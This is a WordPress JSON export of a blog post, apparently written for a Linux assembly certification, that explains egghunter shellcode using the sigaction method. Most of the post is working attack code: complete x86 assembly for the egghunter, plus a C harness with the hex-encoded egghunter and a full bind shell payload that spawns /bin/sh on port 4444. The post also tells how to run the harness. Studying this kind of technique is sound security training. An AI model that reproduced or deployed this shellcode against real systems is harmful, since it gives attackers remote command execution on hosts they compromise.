{"id":117,"date":"2020-08-26T00:00:20","date_gmt":"2020-08-26T00:00:20","guid":{"rendered":"https:\/\/badbit.vc\/?p=117"},"modified":"2020-09-02T20:26:21","modified_gmt":"2020-09-02T20:26:21","slug":"egghunters","status":"publish","type":"post","link":"https:\/\/badbit.vc\/index.php\/2020\/08\/26\/egghunters\/","title":{"rendered":"Egghunters"},"content":{"rendered":"\n

To define in a single line, egg hunting is the process of searching a process’s Address Space in a reliable manner for a given key (egg). <\/p>\n\n\n\n

Egg-hunt (Wikipedia<\/a>)<\/em><\/h4>\n\n\n\n

This is another form of staged shellcode, which is used if an attacker can inject a larger shellcode into the process but cannot determine where in the process it will end up. Small egg-hunt shellcode is injected into the process at a predictable location and executed. This code then searches the process’s address space for the larger shellcode (the egg) and executes it.<\/em><\/p>\n\n\n\n

\n\n\n\n

In this blogpost, we will create our own Egghunter shellcode which will execute \/bin\/bash. We will implement one of the methods from the amazing research done by Skape about “Safely Searching Process Virtual Address Space<\/em>“.<\/p>\n\n\n\n

We will use the sigaction<\/strong><\/em> approach as mentioned in Skape’s research<\/a>. As seen in the man refernce below, the syscall “sigaction”<\/strong> takes the following arguments:

EAX = 67
EBX = signum
ECX = *act
EDX = *oldact

The goal here will be to use the act structure as the pointer for validating a larger region of memory than a single byte. I won’t be going any further in the details of the syscall as the research paper already covers it in great extent. <\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Below is the shellcode which uses 0x50905090 as the key (egg) and hunts for it in the address space. As soon as the compare operation succeeds, the flow is redirected to the actual payload.<\/p>\n\n\n\n

global _start\n\nsection .text\n_start:\n\nverify_area:\n\tor cx,0xfff ; page alignment\n\nhunt_addr:\n\tinc ecx\n\tpush 0x43 ; Syscall 67 - sigaction\n\tpop eax\n\tint 0x80\n\n\tcmp al,0xf2 ; Compare return value of the syscall against low byte of EFAULT value\n\tjz verify_area ; If efault is produced, i.e the memory region doesn't exist -> Loop incrementing ecx\n\n\tmov eax,0x50905090 ; Move egg in eax for SCASD operation\n\tmov edi,ecx ; Pointer to in-memory string to be compared moved in edi\n\n\tscasd ; Compare first part of the egg\n\n\tjnz hunt_addr ; If the egg does not match, loop incrementing the address\n\n\tscasd  ; Compare second part of the egg\n\n\tjnz hunt_addr ; Loop again if no match\n\n\tjmp edi ; Jump to the payload if match successful\n<\/code><\/pre>\n\n\n\n
Now we will generate shellcode using the cli-fu as shown in previous posts<\/a> from the above asm code and use it in our C harness.<\/p>\n\n\n\n
Below is our C harness which contains our egghunter shellcode from above and the bind shell shellcode from the first post of the series. Do note how we have appended our key to the actual shellcode. <\/em><\/p>\n\n\n\n
\/\/ Author - badbit\n\/\/ Egghunter shellcode spawning a bind shell on localhost:4444 \n\n#include <stdio.h>\n#include <string.h>\n\n\nchar egghunter[] = \"\\x66\\x81\\xc9\\xff\\x0f\\x41\\x6a\\x43\\x58\\xcd\\x80\\x3c\\xf2\\x74\\xf1\\xb8\\x90\\x50\\x90\\x50\\x89\\xcf\\xaf\\x75\\xec\\xaf\\x75\\xe9\\xff\\xe7\";\n\n\nchar shellcode[] = \\\n\"\\x90\\x50\\x90\\x50\"\n\"\\x90\\x50\\x90\\x50\"\n\"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\xb3\\x01\\x51\\x53\\x6a\\x02\\x89\\xe1\\xb0\\x66\\xcd\\x80\\x89\\xc6\\xb0\\x66\\x31\\xdb\\x53\\x66\\x68\\x11\\x5c\\x66\\x6a\\x02\\x89\\xe1\\x6a\\x10\\x51\\x56\\x89\\xe1\\xb3\\x02\\xcd\\x80\\xb0\\x66\\x31\\xdb\\x53\\x56\\x89\\xe1\\xb3\\x04\\xcd\\x80\\xb0\\x66\\x31\\xdb\\x53\\x53\\x56\\x89\\xe1\\xb3\\x05\\xcd\\x80\\x89\\xc3\\xb9\\x02\\x00\\x00\\x00\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\x31\\xc9\\x89\\xca\\x51\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\xb0\\x0b\\xcd\\x80\";\n\n\n\nint main()\n{\n\tprintf(\"[+] Shell bound to port 4444.\\n\");\n\tprintf(\"[+] Original shellcode length : %d\\n\", strlen((char*)shellcode)-8);\n\tprintf(\"[+] Length of egghunter : %d\\n\\n\\n\", strlen((char*)egghunter));\n\n\tint (*ret)() = (int(*)())egghunter;\n\tret();\n\n}\n<\/code><\/pre>\n\n\n\n
Compiling the above with the stack marked as executable, and running it, we get the below output:<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
On the right window, we can see our payload successfully executing and on the left we can see that we are conencted to our bind shell and successfully executing commands on the host.<\/p>\n\n\n\n
Resources:<\/strong><\/p>\n\n\n\n
  1. The original research by Skape – http:\/\/www.hick.org\/code\/skape\/papers\/egghunt-shellcode.pdf<\/a><\/li>
  2. Brilliant article on Egghunters (Windows) by HackSysTeam – https:\/\/www.exploit-db.com\/docs\/english\/18482-egg-hunter—a-twist-in-buffer-overflow.pdf<\/a><\/li><\/ol>\n\n\n\n
    That’s all for this blog post.<\/p>\n\n\n\n
    \n\n\n\n
    This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
    http:\/\/securitytube-training.com\/online-courses\/securitytube-linux-assembly-expert\/<\/a><\/p>\n\n\n\n
    Student ID: PA-14690<\/p>\n\n\n\n
    Egghunter shellcode Github Repo<\/a><\/p>\n\n\n\n
    In the next blog post<\/a>, we will create our own Custom Encoder scheme which can be used to defeat signature based detection schemes.<\/p>\n","protected":false},"excerpt":{"rendered":"
    To define in a single line, egg hunting is the process of searching a process’s Address Space in a reliable manner for a given key (egg). Egg-hunt (Wikipedia) This is another form of staged shellcode, which is used if an attacker can inject a larger shellcode into the process but cannot determine where in the process it…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,4],"tags":[7,5,8,6],"class_list":["post-117","post","type-post","status-publish","format-standard","hentry","category-shellcoding","category-slae-x86","tag-linux","tag-shellcode","tag-slae","tag-x86"],"_links":{"self":[{"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/posts\/117","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/comments?post=117"}],"version-history":[{"count":10,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/posts\/117\/revisions"}],"predecessor-version":[{"id":325,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/posts\/117\/revisions\/325"}],"wp:attachment":[{"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/media?parent=117"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/categories?post=117"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/tags?post=117"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}